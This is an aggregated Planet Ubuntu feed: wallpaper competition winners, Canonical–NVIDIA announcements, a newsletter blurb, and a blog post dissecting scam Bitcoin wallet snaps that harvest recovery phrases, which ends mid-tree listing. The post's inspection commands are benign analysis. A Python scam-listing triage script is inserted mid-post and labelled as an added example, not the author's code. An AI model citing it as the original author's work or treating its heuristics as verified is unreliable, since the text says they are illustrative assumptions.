<img alt="" height="900" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_1600,h_900/https://ubuntu.com/wp-content/uploads/c919/noble1.png" width="1600" />
</noscript>
</div>
</figure>
<figure class="wp-block-image size-full">
<div class="lazyload">
<noscript>
<img alt="" height="900" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_1600,h_900/https://ubuntu.com/wp-content/uploads/9a13/noble-dark.png" width="1600" />
</noscript>
</div>
</figure>
<figure class="wp-block-image size-large">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://assets.ubuntu.com/v1/f8ee84cd-noble-numbat-wallpaper-light.png" width="720" />
</noscript>
</div>
</figure>
<figure class="wp-block-image size-full">
<div class="lazyload">
<noscript>
<img alt="" height="900" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_1600,h_900/https://ubuntu.com/wp-content/uploads/9bd7/noble-medium.png" width="1600" />
</noscript>
</div>
</figure>
<h2 class="wp-block-heading">Art of the round table</h2>
<p>This majestic wallpaper will be joined by a collection of others from the current incarnation of the <a href="https://discourse.ubuntu.com/t/noble-numbat-24-04-wallpaper-competition/42300">Ubuntu Wallpaper Competition</a>. This year’s competition has attracted other Numbat contestants, exciting scenery from the land of the Numbat, and abstract art in honor of their majesty. We cordially invite you to behold the distinguished recipients of this year’s accolades:</p>
<h3 class="wp-block-heading">Mascot</h3>
<figure class="wp-block-image size-large">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://assets.ubuntu.com/v1/091702e2-community_wallpaper_noble_fuwafuwa_nanbatto_san_by_amaral.jpeg" width="720" />
</noscript>
</div>
Fuwafuwa Nanbatto-san by <a href="https://discourse.ubuntu.com/u/amaral">@amaral</a></figure>
<figure class="wp-block-image size-large">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://assets.ubuntu.com/v1/0ecd2ffd-community_wallpaper_noble_little_numbat_boy_by_azskalt.jpeg" width="720" />
</noscript>
</div>
Little numbat boy by <a href="https://discourse.ubuntu.com/u/azskalt" rel="noreferrer noopener" target="_blank">@azskalt</a></figure>
<h3 class="wp-block-heading">Digital art</h3>
<figure class="wp-block-image size-large">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://assets.ubuntu.com/v1/63c50fde-community_wallpaper_noble_province_of_the_south_of_france_by_orbitelambda.jpeg" width="720" />
</noscript>
</div>
Province of the South of France by <a href="https://discourse.ubuntu.com/u/orbitelambda">@orbitelambda</a></figure>
<figure class="wp-block-image size-large">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://assets.ubuntu.com/v1/802d8cc9-community_wallpaper_noble_monument_valley_by_orbitelambda.jpg" width="720" />
</noscript>
</div>
Monument Valley (Arizona) by <a href="https://discourse.ubuntu.com/u/orbitelambda">@orbitelambda</a></figure>
<h3 class="wp-block-heading">Nature</h3>
<figure class="wp-block-image size-large">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://assets.ubuntu.com/v1/070a4d72-community_wallpaper_noble_mount_fuji_by_amaral.jpg" width="720" />
</noscript>
</div>
Mount Fuji, Japan by <a href="https://discourse.ubuntu.com/u/amaral">@amaral</a></figure>
<figure class="wp-block-image size-large">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://assets.ubuntu.com/v1/cee4ad9f-community_wallpaper_noble_northan_lights_by_mizuno-as.jpg" width="720" />
</noscript>
</div>
Northan Lights by <a href="https://discourse.ubuntu.com/u/mizuno-as">@mizuno-as</a></figure>
<h3 class="wp-block-heading">Others</h3>
<figure class="wp-block-image size-large">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://assets.ubuntu.com/v1/260fd557-community_wallpaper_noble_lightbulb_rainbow_by_audioaddict.jpg" width="720" />
</noscript>
</div>
Lightbulb Rainbow by <a href="https://discourse.ubuntu.com/u/audioaddict">@audioaddict</a></figure>
<figure class="wp-block-image size-large">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://assets.ubuntu.com/v1/8a7454ac-community_wallpaper_noble_clouds_by_moka-hun.jpeg" width="720" />
</noscript>
</div>
Clouds by <a href="https://discourse.ubuntu.com/u/moka-hun">@moka-hun</a></figure>
<h2 class="wp-block-heading">Get involved</h2>
<p>In the grand tapestry of our Ubuntu realm, the Ubuntu Wallpaper Competition stands as one avenue for you, esteemed allies and artisans, to contribute to our vibrant community. I invite you to explore the many ways to join our collective endeavor. Venture to <a href="https://ubuntu.com/community/contribute">https://ubuntu.com/community/contribute</a> and enrich Ubuntu with your creativity and collaboration.</p>
Ubuntu developers
http://planet.ubuntu.com/
Ubuntu Blog: Canonical accelerates AI Application Development with NVIDIA AI Enterprise
https://ubuntu.com//blog/charmed-k8s-support-comes-to-nvidia-ai-enterprise
2024-03-18T22:10:00+00:00
<h1 class="wp-block-heading">Charmed Kubernetes support comes to NVIDIA AI Enterprise</h1>
<p>Canonical’s Charmed Kubernetes is now supported on <a href="https://www.nvidia.com/en-us/data-center/products/ai-enterprise/">NVIDIA AI Enterprise 5.0</a>. Organisations using Kubernetes deployments on Ubuntu can look forward to a seamless licensing migration to the latest release of the <a href="https://www.nvidia.com/en-us/data-center/products/ai-enterprise/">NVIDIA AI Enterprise</a> software platform, which provides developers with the latest AI models and optimised runtimes.</p>
<h2 class="wp-block-heading">NVIDIA AI Enterprise 5.0</h2>
<p>NVIDIA AI Enterprise 5.0 is supported across workstations, data centres, and cloud deployments. New updates include:</p>
<ul>
<li>NVIDIA NIM microservices: a set of cloud-native microservices that developers can use as building blocks to support custom AI application development and speed production AI. NIM will be supported on Charmed Kubernetes.</li>
<li><a href="http://ai.nvidia.com">NVIDIA API catalog</a>: quick access for enterprise developers to experiment, prototype and test NVIDIA-optimised foundation models powered by NIM. When ready to deploy, enterprise developers can export the enterprise-ready API and run it on a self-hosted system.</li>
<li>Infrastructure management enhancements include support for vGPU heterogeneous profiles, Charmed Kubernetes, and new GPU platforms.</li>
</ul>
<h2 class="wp-block-heading">Charmed Kubernetes and NVIDIA AI Enterprise 5.0</h2>
<p>Data scientists and developers leveraging NVIDIA frameworks and workflows on Ubuntu across the board now have a single platform to rapidly develop AI applications on the latest generation NVIDIA Tensor Core GPUs. For data scientists and AI/ML developers who would like to deploy their latest AI workloads using Kubernetes, it is vital to get the most performance out of Tensor Core GPUs through NVIDIA drivers and integrations.</p>
<div class="wp-block-image">
<figure class="aligncenter">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh7-us.googleusercontent.com/qafLgDmRQlzyQ_96dYJkeUBiPT1iFHcgQjCevEw1QxqCd9vCofG6dnWYpsKUrR9RMzM-hZyzZVOoRdim2moXMzT-4v5aTsennEU0cQfWClkWDhuTyszEDTxskryrIE_42oO3N215u0o" width="720" />
</noscript>
</div>
Fig. NVIDIA AI Enterprise 5.0</figure></div>
<p>Charmed Kubernetes from Canonical provides several features that are unique to this distribution, including built-in NVIDIA operators and GPU optimisation features, as well as composability and extensibility through customised integrations with the Ubuntu operating system.</p>
<h2 class="wp-block-heading">Best-In-Class Kubernetes from Canonical </h2>
<p>Charmed Kubernetes can automatically detect GPU-enabled hardware and install required drivers from NVIDIA repositories. With the release of Charmed Kubernetes 1.29, the <a href="https://charmhub.io/nvidia-gpu-operator?channel=1.29/stable">NVIDIA GPU Operator charm</a> is available for specific GPU configuration and tuning. With support for GPU operators in Charmed K8s, organisations can rapidly and repeatedly deploy the same models utilising existing on-prem or cloud infrastructure to power AI workloads. </p>
<p>With the NVIDIA GPU operator, users can automatically detect the GPU on the system and install NVIDIA repositories. It also allows for optimal configurations through features such as <a href="https://www.nvidia.com/en-us/technologies/multi-instance-gpu/">NVIDIA Multi-Instance GPU</a> (MIG) technology in order to get the most efficiency out of the Tensor Core GPUs. GPU-optimised instances for AI/ML applications reduce latency and allow for more data processing, freeing up resources for larger-scale applications and more complex model deployment. </p>
<p>Paired with the GPU Operator, the Network Operator enables GPUDirect RDMA (GDR), a key technology that accelerates cloud-native AI workloads by orders of magnitude. GDR optimises network performance by enhancing data throughput and reducing latency. Another distinctive advantage is its seamless compatibility with NVIDIA’s ecosystem, ensuring a cohesive experience for users. Furthermore, its design, tailored for Kubernetes, ensures scalability and adaptability in various deployment scenarios. This all leads to more efficient networking operations, making it an invaluable tool for businesses aiming to harness the power of GPU-accelerated networking in their Kubernetes environments.</p>
<p>Speaking about these solutions, Marcin “Perk” Stożek, Kubernetes Product Manager at Canonical, says: “Charmed Kubernetes validation with NVIDIA AI Enterprise is an important step towards an enterprise-grade, end-to-end solution for AI workloads. By integrating NVIDIA Operators with Charmed Kubernetes, we make sure that customers get what matters to them most: efficient infrastructure for their generative AI workloads.” </p>
<p>Getting started is easy (and free). You can rest assured that Canonical experts are available to help if required.</p>
<h2 class="wp-block-heading">Get started with Canonical open source solutions with NVIDIA AI Enterprise </h2>
<p>Try out NVIDIA AI Enterprise with Charmed Kubernetes with a free, 90-day <a href="http://www.nvidia.com/ai-enterprise-eval">evaluation</a>.</p>
<ul>
<li><a href="https://docs.nvidia.com/nvidia-ai-enterprise-and-charmed-kubernetes-deployment-guide.pdf">NVIDIA AI Enterprise and Charmed Kubernetes Deployment Guide</a></li>
<li>Check out more information about <a href="https://ubuntu.com/nvidia">Canonical and NVIDIA’s efforts to help enterprises adopt AI</a></li>
<li>Canonical software is validated as part of the <a href="https://www.nvidia.com/en-us/data-center/dgx-ready-software/">NVIDIA DGX-Ready Software program</a></li>
<li>GPU acceleration, <a href="https://ubuntu.com/kubernetes/docs/gpu-workers">using GPU workers</a></li>
<li>NVIDIA integration <a href="https://microk8s.io/docs/addon-gpu">GPU operator and MIG</a></li>
<li>Solution brief: <a href="https://ubuntu.com/engage/kubernetes-by-canonical-delivered-on-nvidia-dgx-systems">Kubernetes by Canonical delivered on NVIDIA DGX systems</a></li>
</ul>
Ubuntu developers
http://planet.ubuntu.com/
Ubuntu Blog: Accelerate AI development with Ubuntu and NVIDIA AI Workbench
https://ubuntu.com//blog/accelerate-ai-development-with-ubuntu-and-nvidia-ai-workbench
2024-03-18T22:10:00+00:00
<div class="wp-block-image">
<figure class="aligncenter">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh7-us.googleusercontent.com/A_HSmF3YJY7LbaSsFWcwJLdGiA6MnAi0cCqmtDYmAXd9SE4B5u4AZZ14WVrokXR0VGrG0r_gG6LkQBgXODhC5ZIT9dLt5WvErPgVEoqwFi3HCF15wWDxp7gRE02-IkzqAJt0k5O7zNzwQ-XEC4VhPA" width="720" />
</noscript>
</div>
Fig.1. NVIDIA AI Workbench</figure></div>
<p>Canonical expands its collaboration with NVIDIA through NVIDIA AI Workbench. NVIDIA AI Workbench is supported across workstations, data centres, and cloud deployments.</p>
<p>NVIDIA AI Workbench is an easy-to-use toolkit that allows developers to create, test, and customise AI and machine learning models on their PC or workstation and scale them to the data centre or public cloud. It simplifies interactive development workflows while automating technical tasks that halt beginners and derail experts. Collaborative AI and ML development is now possible on any platform – and for any skill level. </p>
<p>As the preferred OS for data science, artificial intelligence and machine learning, Ubuntu and Canonical play an integral role in AI Workbench capabilities. </p>
<ul>
<li>On Windows, Ubuntu powers AI Workbench via WSL2. </li>
<li>In the cloud, Ubuntu 22.04 LTS enables AI Workbench cloud deployments as the only target OS supported for remote machines. </li>
<li>For AI application deployments from the datacenter to cloud to edge, Ubuntu-based containers are included as a key part of AI Workbench.</li>
</ul>
<p>This seamless end user experience is made possible thanks to the partnership between Canonical and NVIDIA.</p>
<h2 class="wp-block-heading">Define your AI journey, start local and scale globally</h2>
<p>Create, collaborate, and reproduce generative AI and data science projects with ease. Develop and execute while NVIDIA AI Workbench handles the rest:</p>
<ul>
<li><strong>Streamlined setup</strong>: easy installation and configuration of containerized development environments for GPU-accelerated hardware.</li>
<li><strong>Laptop to cloud</strong>: start locally on an RTX PC or workstation and scale out to data centre or cloud in just a few clicks.</li>
<li><strong>Automated workflow management</strong>: simplified management of project resources, versioning, and dependency tracking.</li>
</ul>
<div class="wp-block-image">
<figure class="aligncenter">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh7-us.googleusercontent.com/-EfBv9zbee0oO4GP3pn1BshghxzEY-nkQzA2UKs-3AhtG1UHRto_n1-LTitJ9YCp0XEhry_s6TCRMGoJ7aNMY7DvrHOaSnEZEwLEuveXo6GicOqjuHqi4eWB-SKU8i9bSr6_YKtG9w-iFybrLWN7nQ" width="720" />
</noscript>
</div>
Fig 2. Environment Window in AI Workbench Desktop App</figure></div>
<h2 class="wp-block-heading">Ubuntu and NVIDIA AI Workbench improve the end user experience for Generative AI workloads on client machines</h2>
<p>As the established OS for data science, Ubuntu is now commonly being used for AI/ML development and deployment purposes. This includes development, processing, and iterations of Generative AI (GenAI) workloads. GenAI on both smaller devices and GPUs is increasingly important with the growth of edge AI applications and devices. Applications such as smart cities require more edge devices such as cameras and sensors and thus require more data to be processed at the edge. To make it easier for end users to deploy workloads with more customisability, Ubuntu containers are often preferred due to their ease of use for bare metal deployments. NVIDIA AI Workbench offers Ubuntu container options that are well integrated and suited for GenAI use cases.</p>
<div class="wp-block-image">
<figure class="aligncenter">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh7-us.googleusercontent.com/xp2N0FrI5yUtEwGTbxkrDp1USeMgoL1Wo5O72Lqm4mXzSd6Uv-TulZfsilYc9YHynFb3EEq2ln-KAp0KWsgLBTL4OXhpPyUVsC9MAdAxT4IweW4TeE1YNyRO2K0tah-I7Tk2H43t7w_hjfiXN7hIIA" width="720" />
</noscript>
</div>
Fig 3. AI Workbench Development Workflow</figure></div>
<h2 class="wp-block-heading">Peace of mind with Ubuntu LTS</h2>
<p>With Ubuntu, developers benefit from Canonical’s 20-year track record of Long Term Supported releases, delivering security updates and patching for 5 years. With <a href="https://ubuntu.com/pro">Ubuntu Pro</a>, organisations can extend that support and security maintenance commitment to 10 years, offloading security and compliance from their teams so they can focus on building great models. Together, Canonical and Ubuntu provide an optimised and secure environment for AI innovators wherever they are. </p>
<p><a href="https://www.nvidia.com/en-us/deep-learning-ai/solutions/data-science/workbench/">Getting started</a> is easy (and free).</p>
<h2 class="wp-block-heading">Get started with Canonical Open Source AI Solutions</h2>
<ul>
<li>Check out more information about <a href="https://ubuntu.com/nvidia">Canonical and NVIDIA’s efforts to help enterprises adopt AI</a>.</li>
<li>Canonical software is validated as part of the <a href="https://www.nvidia.com/en-us/data-center/dgx-ready-software/">NVIDIA DGX-Ready Software program</a>.</li>
<li>Download the <a href="https://ubuntu.com/engage/run-ai-at-scale">Run AI at scale whitepaper</a> to learn how to build your performant ML stack with NVIDIA DGX and Kubeflow.</li>
<li>Check out more information about <a href="https://www.nvidia.com/en-us/deep-learning-ai/solutions/data-science/workbench/">AI Workbench</a>.</li>
</ul>
Ubuntu developers
http://planet.ubuntu.com/
The Fridge: Ubuntu Weekly Newsletter Issue 831
https://fridge.ubuntu.com/?p=10117
2024-03-18T21:08:51+00:00
<figure class="wp-block-image"><img alt="" src="https://fridge.ubuntu.com/wp-content/uploads/2020/02/c9d7/header.png" /></figure>
<p>Welcome to the Ubuntu Weekly Newsletter, <strong>Issue 831 for the week of March 10 – 16, 2024</strong>. The full version of this issue is available <a href="https://discourse.ubuntu.com/t/ubuntu-weekly-newsletter-issue-831/43245">here</a>.</p>
<p>In this issue we cover:</p>
<ul><li>Welcome New Members and Developers</li><li>Ubuntu Stats</li><li>Hot in Support</li><li>UbuCon Asia 2024 – Call for proposals</li><li>Catalan Team: Call for participation in the Noble Festival</li><li>LoCo Events</li><li>Ubuntu Quality – Communications and Testing Practices</li><li>Other Community News</li><li>Ubuntu Cloud News</li><li>Canonical News</li><li>In the Press</li><li>In the Blogosphere</li><li>Other Articles of Interest</li><li>Featured Audio and Video</li><li>Meeting Reports</li><li>Upcoming Meetings and Events</li><li>Updates and Security for Ubuntu 20.04, 22.04, and 23.10</li><li>And much more!</li></ul>
<p><strong>The Ubuntu Weekly Newsletter is brought to you by:</strong></p>
<ul><li>Krytarik Raido</li><li>Bashing-om</li><li>Chris Guiver</li><li>Wild Man</li><li>And many others</li></ul>
<p>If you have a story idea for the Weekly Newsletter, join the <a href="https://lists.ubuntu.com/mailman/listinfo/Ubuntu-news-team">Ubuntu News Team mailing list</a> and submit it. Ideas can also be added to the <a href="https://wiki.ubuntu.com/UbuntuWeeklyNewsletter/Ideas">wiki</a>!</p>
<div class="wp-block-image"><figure class="alignleft"><img alt="" src="https://fridge.ubuntu.com/wp-content/uploads/2015/05/ab28/CCL.png" /></figure></div>
<p></p>
Ubuntu developers
http://planet.ubuntu.com/
Alan Pope: Guess Who's Back? Exodus Scam BitCoin Wallet Snap!
https://popey.com/blog/2024/03/exodus-wallet-part-three/
2024-03-18T20:00:00+00:00
<h2 id="previously">Previously…</h2>
<p>Back in February, I <a href="https://popey.com/blog/blog/2024/02/exodus-bitcoin-wallet-490k-swindle/">blogged</a> about a series of scam Bitcoin wallet apps that were published in the Canonical Snap store, including one which netted a scammer <strong>$490K</strong> of some poor rube’s coin.</p>
<p>The snap was <em>eventually</em> <a href="https://popey.com/blog/blog/2024/02/exodus-bitcoin-wallet-follow-up">removed</a>, and <a href="https://forum.snapcraft.io/t/should-unverified-cryptocurrency-apps-be-banned/38919/4">some</a> <a href="https://forum.snapcraft.io/t/stronger-identity-verification-for-all-publishers/39061">threads</a> were started over on the <a href="https://snapcraft.io/">Snapcraft forum</a>.</p>
<h2 id="groundhog-day">Groundhog Day</h2>
<p>Nothing has changed it seems, because once again, <strong>ANOTHER</strong> <strong>TEN</strong> scam BitCoin wallet apps have been published in the Snap Store today.</p>
<p><a href="https://www.youtube.com/watch?v=H6-IQAdFU3w"><img alt="You’re joking! Not another one!" src="https://popey.com/blog/blog/images/2024-03-18/not-another-one.gif" /></a></p>
<p>Yes, Brenda!</p>
<p>This one has the snappy (sorry) name of <code>exodus-build-96567</code> published by that not-very-legit looking publisher <code>digisafe00000</code>. Uh-huh.</p>
<p><strong>Edit</strong>: Initially I wrote this post after analysing one of the snaps I stumbled upon. It’s been pointed out there’s a whole bunch under this account. All with popular crypto wallet brand names.</p>
<p><a href="https://popey.com/blog/blog/images/2024-03-18/publisher-1_50.png"><img alt="Publisher digisafe00000" src="https://popey.com/blog/blog/images/2024-03-18/publisher-1.png" /></a></p>
<p><strong>Edit</strong>: These were removed. <strong>One day later</strong>, they popped up <strong>again</strong>, under a new account. I reported all of them, and pinged someone at Canonical to get them removed.</p>
<p><a href="https://popey.com/blog/blog/images/2024-03-19/codeshield0x0000_50.png"><img alt="Publisher codeshield0x0000" src="https://popey.com/blog/blog/images/2024-03-19/codeshield0x0000.png" /></a></p>
<p>There’s no indication this is the same developer as the last scam Exodus Wallet snap published in February, or the one published back in November last year.</p>
<h2 id="presentation">Presentation</h2>
<p>Here’s what it looks like on the Snap Store page <a href="https://snapcraft.io/exodus-build-96567">https://snapcraft.io/exodus-build-96567</a> - which may be gone by the time you see this. A real <em>minimum effort</em> on the store listing page here. But I’m sure it could fool someone, they usually do.</p>
<p><a href="https://popey.com/blog/blog/images/2024-03-18/snap-store-1.png"><img alt="A not very legit looking snap" src="https://popey.com/blog/blog/images/2024-03-18/snap-store-1_50.png" /></a></p>
<p>It also shows up in searches within the desktop graphical storefront “Ubuntu Software” or “App Centre”, making it super easy to install.</p>
<p><strong>Note:</strong> Do <strong>not</strong> install this.</p>
<p>“<em>Secure, Manage, and Swap all your favorite assets</em>.” None of that is true, as we’ll see later. Although one could argue “swap” is true if you don’t mind “swapping” all your BitCoin for an empty wallet, I suppose.</p>
<p>Although it is “<em>Safe</em>”, apparently, according to the store listing.</p>
<p><a href="https://popey.com/blog/blog/images/2024-03-18/snap-store-2.png"><img alt="Coming to a desktop near you" src="https://popey.com/blog/blog/images/2024-03-18/snap-store-2_50.png" /></a></p>
<h2 id="open-wide">Open wide</h2>
<p>It looks like the <code>exodus-build-96567</code> snap was only published to the store today. I wonder what happened to builds 1 through 96566!</p>
<div class="highlight"><pre tabindex="0"><code class="language-bash"><span style="display: flex;"><span>$ snap info exodus-build-96567
</span></span><span style="display: flex;"><span>name: exodus-build-96567
</span></span><span style="display: flex;"><span>summary: Secure, Manage, and Swap all your favorite assets.
</span></span><span style="display: flex;"><span>publisher: Digital Safe <span style="color: #f92672;">(</span>digisafe00000<span style="color: #f92672;">)</span>
</span></span><span style="display: flex;"><span>store-url: https://snapcraft.io/exodus-build-96567
</span></span><span style="display: flex;"><span>license: unset
</span></span><span style="display: flex;"><span>description: |
</span></span><span style="display: flex;"><span> Forget managing a million different wallets and seed phrases.
</span></span><span style="display: flex;"><span> Secure, Manage, and Swap all your favorite assets in one beautiful, easy-to-use wallet.
</span></span><span style="display: flex;"><span>snap-id: wvexSLuTWD9MgXIFCOB0GKhozmeEijHT
</span></span><span style="display: flex;"><span>channels:
</span></span><span style="display: flex;"><span> latest/stable: 8.6.5 2024-03-18 <span style="color: #f92672;">(</span>1<span style="color: #f92672;">)</span> 565kB -
</span></span><span style="display: flex;"><span> latest/candidate: ↑
</span></span><span style="display: flex;"><span> latest/beta: ↑
</span></span><span style="display: flex;"><span> latest/edge: ↑
</span></span></code></pre></div><p>Here’s the app running in a VM.</p>
<p><a href="https://popey.com/blog/blog/images/2024-03-18/exodus-wallet-2.png"><img alt="The application" src="https://popey.com/blog/blog/images/2024-03-18/exodus-wallet-2_50.png" /></a></p>
<p>If you try and create a new wallet, it waits a while then gives a spurious error. That code path likely does nothing. What it really wants you to do is “Add an existing wallet”.</p>
<p><a href="https://popey.com/blog/blog/images/2024-03-18/exodus-wallet-1.png"><img alt="Give us all your money" src="https://popey.com/blog/blog/images/2024-03-18/exodus-wallet-1_50.png" /></a></p>
<p>As with all these scam applications, all it does is ask for a BitCoin recovery phrase, and with that will likely steal all the coins and send them off to the scammer’s wallet. Obviously I didn’t test this with a real wallet phrase.</p>
<p>When given a false passphrase/recovery-key it calls some remote API then shows a dubious error, having already taken your recovery key, and sent it to the scammer.</p>
<p><a href="https://popey.com/blog/blog/images/2024-03-18/error-1.png"><img alt="Error" src="https://popey.com/blog/blog/images/2024-03-18/error-1_50.png" /></a></p>
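<p>The <code>snap info</code> listing above already carries several of the warning signs this post points at: a wallet brand in the name, a build-number suffix, a publisher account ending in a run of digits, an unset license and a first revision sitting in stable. The Python below is an added example, not code from the original post or from snapd, that parses that output and flags those signs. The heuristics, the brand watchlist, the benign comparison listing and the verified-publisher marks (<code>✓</code> or <code>**</code>) are assumptions chosen for illustration.</p>

```python
import re

# `snap info` output for the snap analysed in the post (description trimmed to its first line).
SCAM_INFO = """\
name: exodus-build-96567
summary: Secure, Manage, and Swap all your favorite assets.
publisher: Digital Safe (digisafe00000)
store-url: https://snapcraft.io/exodus-build-96567
license: unset
description: |
  Forget managing a million different wallets and seed phrases.
snap-id: wvexSLuTWD9MgXIFCOB0GKhozmeEijHT
channels:
  latest/stable:    8.6.5 2024-03-18 (1) 565kB -
  latest/candidate: ↑
  latest/beta:      ↑
  latest/edge:      ↑
"""

# Constructed listing of an established, verified publisher, for comparison only.
BENIGN_INFO = """\
name: example-notes
publisher: Example Project**
license: MIT
snap-id: CONSTRUCTED-SAMPLE-ID
channels:
  latest/stable:    2.4.1      2024-01-10 (57) 12MB -
  latest/candidate: ↑
  latest/beta:      2.5.0-beta 2024-03-01 (61) 12MB -
  latest/edge:      ↑
"""

# Assumption: a small sample watchlist of wallet brands; extend it for real use.
BRAND_WATCHLIST = ("exodus", "ledger", "trezor")
# Assumption: verified publishers are shown with a tick, or "**" without Unicode.
VERIFIED_MARKS = ("✓", "**")


def parse_snap_info(text):
    """Parse `snap info` text into a dict; 'channels' maps channel -> fields."""
    info, channels, section = {}, {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if raw[0] in " \t":  # indented line: belongs to the open block
            if section == "channels":
                chan, _, rest = line.partition(":")
                channels[chan.strip()] = rest.split()
            elif section == "description":
                info["description"] = (info.get("description", "") + " " + line).strip()
            continue
        key, sep, value = line.partition(":")  # first colon only, so URLs survive
        if not sep:
            continue
        key, value = key.strip(), value.strip()
        section = key if key in ("channels", "description") else None
        if section is None or (key == "description" and value != "|"):
            info[key] = value
    info["channels"] = channels
    return info


def parse_publisher(value):
    """Return (username, verified) from the publisher field."""
    verified = any(mark in value for mark in VERIFIED_MARKS)
    clean = re.sub(r"[✓✪*]", "", value).strip()  # drop badge characters
    match = re.search(r"\(([^)]+)\)$", clean)     # "Display Name (username)"
    username = match.group(1).strip() if match else clean.lower().replace(" ", "-")
    return username, verified


def triage(text, brands=BRAND_WATCHLIST):
    """Return a list of (code, detail) findings for one `snap info` listing."""
    info = parse_snap_info(text)
    name = info.get("name", "").lower()
    username, verified = parse_publisher(info.get("publisher", ""))
    findings = []
    brand = next((b for b in brands if b in name), None)
    if brand and not verified:
        findings.append(("brand-unverified", f"'{brand}' in name, publisher '{username}' not verified"))
    if re.search(r"-build-\d+$", name):
        findings.append(("build-suffix", "name ends in a build-number suffix"))
    if re.search(r"\d{3,}$", username):
        findings.append(("generated-username", f"publisher '{username}' ends in a digit run"))
    if info.get("license", "unset") == "unset":
        findings.append(("license-unset", "no license declared"))
    stable = info["channels"].get("latest/stable", [])
    if "(1)" in stable:
        findings.append(("rev1-in-stable", "first revision published straight to stable"))
    return findings


if __name__ == "__main__":
    for label, text in (("scam", SCAM_INFO), ("benign", BENIGN_INFO)):
        print(label)
        for code, detail in triage(text):
            print(f"  [{code}] {detail}")
```

<p>No single finding proves anything on its own; the value is in several of them stacking up on one listing, which is what happens here.</p>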
<h2 id="whats-inside">What’s inside?</h2>
<p>While the snap is still available for download from the store, I grabbed it.</p>
<div class="highlight"><pre tabindex="0"><code class="language-bash"><span style="display: flex;"><span>$ snap download exodus-build-96567
</span></span><span style="display: flex;"><span>Fetching snap <span style="color: #e6db74;">"exodus-build-96567"</span>
</span></span><span style="display: flex;"><span>Fetching assertions <span style="color: #66d9ef;">for</span> <span style="color: #e6db74;">"exodus-build-96567"</span>
</span></span><span style="display: flex;"><span>Install the snap with:
</span></span><span style="display: flex;"><span> snap ack exodus-build-96567_1.assert
</span></span><span style="display: flex;"><span> snap install exodus-build-96567_1.snap
</span></span></code></pre></div><p>I then unpacked the snap to take a peek inside.</p>
<div class="highlight"><pre tabindex="0"><code class="language-bash"><span style="display: flex;"><span>$ unsquashfs exodus-build-96567_1.snap
</span></span><span style="display: flex;"><span>Parallel unsquashfs: Using <span style="color: #ae81ff;">8</span> processors
</span></span><span style="display: flex;"><span><span style="color: #ae81ff;">11</span> inodes <span style="color: #f92672;">(</span><span style="color: #ae81ff;">21</span> blocks<span style="color: #f92672;">)</span> to write
</span></span><span style="display: flex;"><span>
</span></span><span style="display: flex;"><span><span style="color: #f92672;">[===========================================================</span>|<span style="color: #f92672;">]</span> 32/32 100%
</span></span><span style="display: flex;"><span>
</span></span><span style="display: flex;"><span>created <span style="color: #ae81ff;">11</span> files
</span></span><span style="display: flex;"><span>created <span style="color: #ae81ff;">8</span> directories
</span></span><span style="display: flex;"><span>created <span style="color: #ae81ff;">0</span> symlinks
</span></span><span style="display: flex;"><span>created <span style="color: #ae81ff;">0</span> devices
</span></span><span style="display: flex;"><span>created <span style="color: #ae81ff;">0</span> fifos
</span></span><span style="display: flex;"><span>created <span style="color: #ae81ff;">0</span> sockets
</span></span><span style="display: flex;"><span>created <span style="color: #ae81ff;">0</span> hardlinks
</span></span></code></pre></div><p>There’s not a lot in here. Mostly the usual snap scaffolding, metadata, and the single <code>exodus-bin</code> application binary in <code>bin/</code>.</p>
<div class="highlight"><pre tabindex="0"><code class="language-bash"><span style="display: flex;"><span>$ tree squashfs-root/
</span></span><span style="display: flex;"><span>squashfs-root/
</span></span><span style="display: flex;"><span>├── bin
</span></span><span style="display: flex;"><span>│ └── exodus-bin
</span></span><span style="display: flex;"><span>├── meta
</span></span><span style="display: flex;"><span>│ ├── gui
</span></span><span style="display: flex;"><span>│ │ ├── exodus-build-96567.desktop
</span></span><span style="display: flex;"><span>│ │ └── exodus-build-96567.png
</span></span><span style="display: flex;"><span>│ ├── hooks
</span></span><span style="display: flex;"><span>│ │ └── configure
</span></span><span style="display: flex;"><span>│ └── snap.yaml
</span></span><span style="display: flex;"><span>└── snap
</span></span><span style="display: flex;"><span> ├── command-chain
</span></span><span style="display: flex;"><span> │ ├── desktop-launch
</span></span><span style="display: flex;"><span> │ ├── hooks-configure-fonts
</span></span><span style="display: flex;"><span> │ └── run
</span></span><span style="display: flex;"><span> ├── gui
